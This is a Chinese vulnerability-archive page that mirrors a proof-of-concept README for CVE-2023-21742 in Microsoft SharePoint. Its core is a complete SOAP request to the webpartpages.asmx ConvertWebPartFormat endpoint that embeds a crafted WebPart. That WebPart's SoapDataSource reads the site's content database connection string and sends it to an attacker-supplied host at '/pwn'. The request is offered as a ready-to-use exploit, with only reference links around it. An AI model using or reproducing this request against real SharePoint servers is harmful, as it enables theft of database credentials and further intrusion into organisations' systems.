支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: 588c8b50be9c00dc221f6e926636a591e6069f98

来源
https://github.com/ohnonoyesyes/CVE-2023-21742
关联漏洞
标题:Microsoft SharePoint 安全漏洞 (CVE-2023-21742)
Description:Microsoft SharePoint是美国微软(Microsoft)公司的一套企业业务协作平台。该平台用于对业务信息进行整合,并能够共享工作、与他人协同工作、组织项目和工作组、搜索人员和信息。 Microsoft SharePoint存在安全漏洞。攻击者利用该漏洞可以远程执行代码。
Description
CVE-2023-21742 Poc
介绍
# CVE-2023-21742

## PoC

Attention: It's only a PoC to leak the attribute/property, not RCE EXP.

```
POST /_vti_bin/webpartpages.asmx HTTP/1.1
Host: splab13
SOAPAction: http://microsoft.com/sharepoint/webpartpages/ConvertWebPartFormat
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0
Connection: keep-alive
Content-Type: text/xml; charset=utf-8
Content-Length: 1733

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><ConvertWebPartFormat xmlns="http://microsoft.com/sharepoint/webpartpages"><inputFormat><![CDATA[
<%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPages" Assembly="Microsoft.SharePoint, Version=15.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
      <%@ Register TagPrefix="att" Namespace="Microsoft.SharePoint.WebControls" Assembly="Microsoft.SharePoint, Version=15.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<WebPartPages:WebPartZone id="id00" runat="server">
<ZoneTemplate>

<WebPartPages:XsltListFormWebPart id="id01" runat="server"> 
<XmlDefinitionLink>http://webdb.com/aaaa</XmlDefinitionLink>
  <DataSources> 
 <att:SoapDataSource runat="server" SelectUrl="http://[host]/pwn">
      <SelectCommand>
        <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
          <soap:Body>
          <leakeddata>{leak}</leakeddata>
          </soap:Body>
        </soap:Envelope>
      </SelectCommand>
      <SelectParameters>
        <WebPartPages:DataFormParameter Name="leak" PropertyName="Parent.Controls[1].Controls[0].Web.Site.ContentDatabase.DatabaseConnectionString" DefaultValue="NULL"/>
      </SelectParameters>
    </att:SoapDataSource> 
  </DataSources> 
  
</WebPartPages:XsltListFormWebPart>
<att:TemplateContainer runat="server" id="f01" />
</ZoneTemplate>
</WebPartPages:WebPartZone> 

]]></inputFormat></ConvertWebPartFormat></soap:Body></soap:Envelope>
```

## Reference

- https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-sharepoint-webpart-property-traversal-cve-2022-38053-cve-2023-21742-bc6931698a5f
- https://nvd.nist.gov/vuln/detail/CVE-2023-21742
文件快照

 [4.0K]  /data/pocs/588c8b50be9c00dc221f6e926636a591e6069f98
└── [2.2K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。